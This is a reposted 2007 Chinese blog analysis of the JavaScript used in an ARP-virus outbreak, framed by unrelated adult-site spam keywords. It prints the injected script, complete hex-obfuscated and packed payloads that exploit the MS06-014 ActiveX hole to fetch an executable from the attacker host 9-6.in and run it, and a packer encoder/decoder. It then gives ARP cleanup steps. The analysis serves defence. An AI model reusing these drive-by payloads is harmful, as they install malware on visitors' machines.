成人深夜视频,在线播放成人,亚洲68283精品人体

本文的目的是探討JS相關技術，并不是以殺毒為主要目的，殺毒只是為講解一些JS做鋪墊的，呵呵，文章有點長，倒杯咖啡或者清茶慢慢看，學習切勿急躁！

最近公司的網絡中了這兩天鬧的很歡的ARP病毒，導致大家都無法上網，給工作帶來了很大的不方便，在這里寫下殺毒的過程，希望對大家能有幫助！

現象：打開部分網頁顯示為亂碼，好像是隨機的行為，但是看似又不是，因為它一直在監視msn.com，呵呵，可能和微軟有仇吧，繼續查看源代碼，發現頭部有一個js文件鏈接----<script src=http://9-6.in/n.js></script>；

來源：經過一番網絡搜索，發現這個域名是印度域名，而IP地址卻是美國的，而且域名的注冊日期是7月25日，看來一切都是預謀好了的，還是不管這個了，先解決問題吧；

分析：
1、先把（http://9-6.in/n.js）這個JS文件下載下來，代碼如下：

    document.writeln("<script>window.onerror=function(){return true;}<//script>");
    document.writeln("<script src=/"http:////9-6.in//S368//NewJs2.js/"><//script>");
    document.writeln("<script>");
    document.writeln("function StartRun(){");
    document.writeln("var Then = new Date() ");
    document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
    document.writeln("var cookieString = new String(document.cookie)");
    document.writeln("var cookieHeader = /"Cookie1=/" ");
    document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
    document.writeln("if (beginPosition != -1){ ");
    document.writeln("} else ");
    document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
    document.writeln("document.write(/'<iframe width=0 height=0 src=/"http:////9-6.IN//s368//T368.htm/"><//iframe>/');");
    document.writeln("}");
    document.writeln("}");
    document.writeln("StartRun();");
    document.writeln("<//script>")
其中第一句window.onerror=function(){return true;}就先把JS錯誤屏蔽掉，真夠狠的，呵呵，不這樣怎么隱藏自己呢，哈哈！然后還有個JS文件http://9-6.in/S368/NewJs2.js，先繼續往下看，找到StartRun();運行一個函數，函數的主要作用是寫COOKIE，日期為保存一天，然后還用隱藏框架加載了一個文件（http://9-6.IN/s368/T368.htm），其余就沒有什么特別的了；
2、下載（http://9-6.in/S368/NewJs2.js）這個文件，代碼如下：

StrInfo =  "/x3c/x73/x63/x72/x69/x70/x74/x3e/x77/x69/x6e/x64/x6f/x77/x2e/x6f/x6e/x65/x72/x72/x6f/x72/x3d/x66/x75/x6e/x63/x74/x69/x6f/x6e/x28/x29/x7b/x72/x65/x74/x75/x72/x6e /x74/x72/x75/x65/x3b/x7d/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  "/x3c/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  " /x44/x5a/x3d/'///x78/x36/x38///x78/x37/x34///x78/x37/x34///x78/x37/x30///x78/x33/x41///x78/x32/x46///x78/x32/x46///x78/x33/x39///x78/x32/x44///x78/x33/x36///x78/x32/x45///x78/x36/x39///x78/x36/x45///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x66/x75/x6e/x63/x74/x69/x6f/x6e /x47/x6e/x4d/x73/x28/x6e/x29 " +"/n"+
  "/x7b " +"/n"+
  " /x76/x61/x72 /x6e/x75/x6d/x62/x65/x72/x4d/x73 /x3d /x4d/x61/x74/x68/x2e/x72/x61/x6e/x64/x6f/x6d/x28/x29/x2a/x6e/x3b" +"/n"+
  " /x72/x65/x74/x75/x72/x6e /'///x78/x37/x45///x78/x35/x34///x78/x36/x35///x78/x36/x44///x78/x37/x30/'/x2b/x4d/x61/x74/x68/x2e/x72/x6f/x75/x6e/x64/x28/x6e/x75/x6d/x62/x65/x72/x4d/x73/x29/x2b/'///x78/x32/x45///x78/x37/x34///x78/x36/x44///x78/x37/x30/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x74/x72/x79 " +"/n"+
  "/x7b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x76/x61/x72 /x42/x66/x3d/x64/x6f/x63/x75/x6d/x65/x6e/x74/x2e/x63/x72/x65/x61/x74/x65/x45/x6c/x65/x6d/x65/x6e/x74/x28/"http:///x78/x36/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x29/x3b" +"/n"+
  " /x42/x66/x2e/x73/x65/x74/x41/x74/x74/x72/x69/x62/x75/x74/x65/x28/"http:///x78/x36/x33///x78/x36/x43///x78/x36/x31///x78/x37/x33///x78/x37/x33///x78/x36/x39///x78/x36/x34/"/x2c/"http:///x78/x36/x33///x78/x36/x43///x78/x37/x33///x78/x36/x39///x78/x36/x34///x78/x33/x41///x78/x34/x32///x78/x34/x34///x78/x33/x39///x78/x33/x36///x78/x34/x33///x78/x33/x35///x78/x33/x35///x78/x33/x36///x78/x32/x44///x78/x33/x36///x78/x33/x35///x78/x34/x31///x78/x33/x33///x78/x32/x44///x78/x33/x31///x78/x33/x31///x78/x34/x34///x78/x33/x30///x78/x32/x44///x78/x33/x39///x78/x33/x38///x78/x33/x33///x78/x34/x31///x78/x32/x44///x78/x33/x30///x78/x33/x30///x78/x34/x33///x78/x33/x30///x78/x33/x34///x78/x34/x36///x78/x34/x33///x78/x33/x32///x78/x33/x39///x78/x34/x35///x78/x33/x33///x78/x33/x36/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4b/x78/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x34/x44///x78/x36/x39///x78/x36/x33///x78/x37/x32///x78/x36/x46///x78/x37/x33///x78/x36/x46///x78/x36/x36///x78/x37/x34///x78/x32/x45///x78/x35/x38/"/x2b/"http:///x78/x34/x44///x78/x34/x43///x78/x34/x38///x78/x35/x34///x78/x35/x34///x78/x35/x30/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x41/x53/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x34/x31///x78/x36/x34///x78/x36/x46///x78/x36/x34///x78/x36/x32///x78/x32/x45///x78/x35/x33///x78/x37/x34///x78/x37/x32///x78/x36/x35///x78/x36/x31///x78/x36/x44/"/x2c/"/"/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x41/x53/x2e/x74/x79/x70/x65/x3d/x31/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x6f/x70/x65/x6e/x28/"http:///x78/x34/x37///x78/x34/x35///x78/x35/x34/"/x2c /x44/x5a/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x73/x65/x6e/x64/x28/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4e/x73/x31/x3d/x47/x6e/x4d/x73/x28/x39/x39/x39/x39/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x76/x61/x72 /x63/x46/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x35/x33///x78/x36/x33///x78/x37/x32///x78/x36/x39///x78/x37/x30///x78/x37/x34///x78/x36/x39///x78/x36/x45///x78/x36/x37///x78/x32/x45///x78/x34/x36///x78/x36/x39///x78/x36/x43///x78/x36/x35///x78/x35/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x34/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4e/x73/x54/x6d/x70/x3d/x63/x46/x2e/x47/x65/x74/x53/x70/x65/x63/x69/x61/x6c/x46/x6f/x6c/x64/x65/x72/x28/x30/x29/x3b /x4e/x73/x31/x3d /x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2c/x4e/x73/x31/x29/x3b /x41/x53/x2e/x4f/x70/x65/x6e/x28/x29/x3b/x41/x53/x2e/x57/x72/x69/x74/x65/x28/x4b/x78/x2e/x72/x65/x73/x70/x6f/x6e/x73/x65/x42/x6f/x64/x79/x29/x3b" +"/n"+
  " /x41/x53/x2e/x53/x61/x76/x65/x54/x6f/x46/x69/x6c/x65/x28/x4e/x73/x31/x2c/x32/x29/x3b /x41/x53/x2e/x43/x6c/x6f/x73/x65/x28/x29/x3b /x76/x61/x72 /x71/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x35/x33///x78/x36/x38///x78/x36/x35///x78/x36/x43///x78/x36/x43///x78/x32/x45///x78/x34/x31///x78/x37/x30///x78/x37/x30///x78/x36/x43///x78/x36/x39///x78/x36/x33///x78/x36/x31///x78/x37/x34///x78/x36/x39///x78/x36/x46///x78/x36/x45/"/x2c/"/"/x29/x3b" +"/n"+
  " /x6f/x6b/x31/x3d/x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2b/'///x78/x35/x43///x78/x35/x43///x78/x37/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x33/x33///x78/x33/x32/'/x2c/'///x78/x36/x33///x78/x36/x44///x78/x36/x34///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x29/x3b" +"/n"+
  " /x71/x2e/x53/x48/x65/x4c/x4c/x45/x78/x65/x63/x75/x74/x65/x28/x6f/x6b/x31/x2c/'///x78/x32/x30///x78/x32/x46///x78/x36/x33 /'/x2b/x4e/x73/x31/x2c/"/"/x2c/"http:///x78/x36/x46///x78/x37/x30///x78/x36/x35///x78/x36/x45/"/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x63/x61/x74/x63/x68/x28/x4d/x73/x49/x29 /x7b /x4d/x73/x49/x3d/x31/x3b /x7d" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e"
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"](StrInfo);
這個代碼有點長哦，而且有保護措施，全部轉換為十六進制，不過不要害怕，我們有辦法解決，首先得確保你已經安裝了UE，然后打開UE，把代碼粘貼進去（廢話，呵呵），把/x替換為%，然后用html代碼轉換功能，解碼，就可以得到第一次解碼的代碼，第一次？？？，呵呵，這個代碼的作者很變態的，做了兩次編碼，所以我得進行兩次解碼才行，重復剛才的步驟，然后你就可以看到最終的“原始”代碼了；
具體的代碼我就不帖出來了，有一定的危害性，相信大家看了上面的步驟都能自己找到代碼，這里之說一下比較核心的代碼吧；

[Copy to clipboard] [ - ]CODE:
//核心代碼
..............
  " var Bf=document.createElement(/"/o/b/j/e/c/t/");" +"/n"+
  " Bf.setAttribute(/"/c/l/a/s/s/i/d/",/"/c/l/s/i/d/:/B/D/9/6/C/5/5/6/-/6/5/A/3/-/1/1/D/0/-/9/8/3/A/-/0/0/C/0/4/F/C/2/9/E/3/6/");" +"/n"+
  " var Kx=Bf.CreateObject(/"/M/i/c/r/o/s/o/f/t/./X/"+/"/M/L/H/T/T/P/",/"/");" +"/n"+
  " var AS=Bf.CreateObject(/"/A/d/o/d/b/./S/t/r/e/a/m/",/"/");" +"/n"+
.............
  " var cF=Bf.CreateObject(/"/S/c/r/i/p/t/i/n/g/./F/i/l/e/S/y/s/t/e/m/O/b/j/e/c/t/",/"/");" +"/n"+
  " var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"/n"+
  " AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(/"/S/h/e/l/l/./A/p/p/l/i/c/a/t/i/o/n/",/"/");" +"/n"+
  " ok1=cF.BuildPath(NsTmp+/'/////s/y/s/t/e/m/3/2/',/'/c/m/d/./e/x/e/');" +"/n"+
  " q.SHeLLExecute(ok1,/'/ ///c /'+Ns1,/"/",/"/o/p/e/n/",0);" +"/n"+
..............
上面的就是最為核心的代碼，利用MS0614漏洞、創建JS異步對象獲取病毒（*.exe）文件，然后運行，這樣就達到它的目的啦！
3、打開http://9-6.IN/s368/T368.htm查看源代碼，又發現一段怪異的JS文件，如下：

[Copy to clipboard] [ - ]CODE:
<script>
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('x("http://0//6//9//5//i//h//j//j//4//f//8//3//2//0//7//1//i//8//2//3//h//g//4//w//v//u//t//b//s//7//r//g//4//e//f//q//8//3//2//0//7//1//e//4//d//c//d//c//p//5//3//o//n//a//6//1//b//m//2//0//1//a//l//0//6//9//5//k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{}))
</script>

本帖最近評分記錄
bound0   2007-8-6 19:01   威望   +1   鼓勵研究精神！:D

引用  報告回復  心中有夢
[廣告] 【萬網郵箱DIY，靈活購買】| 西部數碼多線虛擬主機全國10強

veking [樓主]

藍色水
高級會員

帖子 275
體力 733
威望 1
注冊 2005-6-16
#2發表于 2007-8-6 16:06  資料  短消息  加為好友
解析arp病毒背后利用的Javascript技術

可以看出這段代碼也是經過加密的了，特征為function(p,a,c,k,e,d)，這種加密方法網上有很多例子，我就不細說了，附上解密代碼：

[Copy to clipboard] [ - ]CODE:
//以下代碼為網上搜索所得，版權歸原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>無標題文檔</title>
</head>
<body>
<script>
a=62;
function encode() {
var code = document.getElementById('code').value;
code = code.replace(/[/r/n]+/g, '');
code = code.replace(/'/g, "http://'");
var tmp = code.match(//b(/w+)/b/g);
tmp.sort();
var dict = [];
var i, t = '';
for(var i=0; i<tmp .length; i++) {
   if(tmp[i] != t) dict.push(t = tmp[i]);
}
var len = dict.length;
var ch;
for(i=0; i<len; i++) {
   ch = num(i);
   code = code.replace(new RegExp('//b'+dict[i]+'//b','g'), ch);
   if(ch == dict[i]) dict[i] = '';
}
document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'////w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('////b'+e(c)+'////b','g'),k[c]);return p}("
   + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))";
}

function num(c) {
return(c<a ?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36));
}

function run() {
eval(document.getElementById('code').value);
}
function decode() {
var code = document.getElementById('code').value;
code = code.replace(/^eval/, '');
document.getElementById('code').value = eval(code);
}
</script>
<textarea id=code cols=80 rows=20>

</textarea><br />
<input type=button onclick=encode() value=編碼/>
<input type=button onclick=run() value=執行/>
<input type=button onclick=decode() value=解碼/>
</body>
</html>
經過解密后代碼為：

[Copy to clipboard] [ - ]CODE:
info =        "<script src=/"S368.jpg/"></script>"
document.write(info)
繼續打開這個表面象圖片的鏈接，呵呵，當然不會是MM圖片了，查看源代碼，找到如下代碼：

[Copy to clipboard] [ - ]CODE:
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("http://K//l//r//8//i//3//6//j//3//6//o//3//6//9//C//3//s//K//l//r//8//i//3//6//9//x")}1g(e){Q}E a=n["http://15//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://R//7//q//3//v//5//4//l","");1h(a["http://7//8//i//3//y//L//m"]("http://z//f//l//4//5//9//3//y//3")!=-1){Q}E b=n["http://15//3//4//j//3//6//o//3//6//v//5//4//l"]();b=b["http://f//r//s//f//4//6"](0,2);b+="http://////v//6//d//k//6//5//J//x//////K//l//r//8//i//3//J//x//////1i//3//s//K//l//r//8//i//3//6//////A//6//d//m//7//q//3//f//////r//f//3//6//h//d//8//m//7//k//9//7//8//7";n["http://j//3//4//p//5//q//q//s//5//h//1j//F//8//4//6//D"](1k,13);E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://7");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://5");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://s");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://h");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://i");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://7","http://S//f//h//6//7//A//4//16//o//5//6 //f//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"http://C//f//h//6//7//A//4//9//f//l//3//q//q//"http://u//g//o//5//6 //d//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"http://f//l//3//q//q//9//5//A//A//q//7//h//5//4//7//d//8//"http://u//g//o//5//6 //5//B//s//B//h//B//i//B//3//B//m//B//k//g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://5","http://H//g//f//9//U//r//8//t//"http://p//V//////////v//6//d//k//6//5//J//x//////////I//8//4//3//6//8//J//x//////////I//F//N//v//17//L//U//F//9//F//N//F //l//4//4//A//1l//O//O//h//1m//x//W//7//18//O//j//X//19//1a//O//i//1n//C//18//Y//Y//W//l//4//Y//1o//"http://B//H//B//H//u//g//f//9//U//r//8//t//"http://h//z//i//9//3//y//3 //Z//h //4//6//3//3 //h//V//////// //Z//m//"http://B//H//B//x//u//g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://s","http://f//9//j//A//3//h//7//5//q//R//d//q//i//3//6//f//t//"http://1p//D//1q//d//h//r//z//3//8//4//f//"http://u//g//s//G//s//9//f//r//s//f//4//6//7//8//k//t//H//B//s//9//q//5//f//4//I//8//i//3//y//L//m//t//"http://////////"http://u//u//g//s//P//G//"http://////////q//d//h//5//q//f//J//x//////////K//3//z//A//d//6//J//x//////////p//d//8//4//3//8//4//9//I//F//1r//////////"http://g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://h","http://d//9//1s//5//z//3//j//A//5//h//3//t//s//u//g//m//d//6//t//5//G//H//g//5//S//h//9//I//4//3//z//f//t//u//9//p//d//r//8//4//g//5//P//P//u//10 //o//5//6 //m//G//h//9//I//4//3//z//f//t//u//9//I//4//3//z//t//5//u//9//v//5//4//l//g//m//P//G//"http://////////j//X//19//1a//1b//1t//x//1u//W//3//y//3//"http://g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://i","http://H//g//4//6//D//10//f//9//F//y//3//h//t//m//u//g//11//h//5//4//h//l//t//3//u//10//11//g//11//C//7//8//i//d//C//9//h//q//d//f//3//t//u//g//S//Z//f//h//6//7//A//4//16");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://v//6//d//4//3//h//4","http://x");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://R//7//q//3//v//5//4//l","http://h//V//////C//7//8//i//d//C//f//////f//D//f//4//3//z//X//1b//////z//f//l//4//5//9//3//y//3");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://v//5//6//5//z//3//4//3//6",b);n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://F//y//4//17//7//f//4","http://9//6//5//6//g//9//M//7//A//g//9//3//y//3//g//9//i//d//h//g//9//h//d//z//g//9//s//7//8//g//9//k//M//g//9//M//g//9//4//5//6//g//9//5//6//T//g//9//q//M//l//g//9//f//7//4//g//9//l//1v//y//g//9//4//k//M//g//9//i//q//q//g//9//d//h//y//g//9//o//s//y//g");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://1w//f//3//6//j//3//4","http://x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好長的代碼，又發現了function(p,a,c,k,e,r)，繼續解碼，代碼很長，請大家自己解碼查看吧，這里應用的還是上面的手法，用加密函數加密，然后轉換為十六進制，盡最大努力混淆我們的視線，來達到不可告人的目的，這里的代碼的主要作用是用另外一種方法下載病毒并運行，思想真的很先進，居然是去調用Web迅雷來下載病毒，然后去運行，作者真的是煞費苦心啊，應用了兩種方法下載病毒，“小樣，就不信毒不倒你！”，呵呵
殺毒：說了半天只是分析了一下ARP病毒發作的時候在干什么，下面就說下關于殺毒的問題，其實現在網上有很多這方面的相關教程，我就簡單總結一下我的殺毒過程吧；
1、中了arp病毒必須要先找到中毒的機器
2、給這個機器斷網、殺毒
3、恢復局域網
其中第一步最關鍵了，如何才能找到呢？
在局域網隨便一臺客戶機上打開網上鄰居，查看工作組計算機，然后等到列表刷新出來后，迅速點擊開始-->運行-->cmd-->arp -a回車，如果機器比較多，請多輸入幾次arp -a，然后仔細查看，你會發現有一臺機器的Mac地址和網關的Mac地址相同，恭喜你，這就是那個毒源！
到這臺機器的跟前（呵呵，廢話真多），剩下的工作相信大家都有很多經驗了吧，殺毒！裝殺毒軟件或者進安全模式更甚者重裝機器，總之把病毒干掉就行了；
最后，到不能打開網頁的機器上執行這個命令：點擊開始-->運行-->cmd-->arp -d回車，然后就可以了。、

終于一切又恢復了平靜，是不是很有成就感呢，呵呵！

本人的第一篇正式的BLOG技術文章終于寫完了，希望大家能喜歡看！

JavaScript技術：解析arp病毒背后利用的Javascript技術附解密方法，轉載需保留來源！

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

解析arp病毒背后利用的Javascript技術附解密方法

相關文章閱讀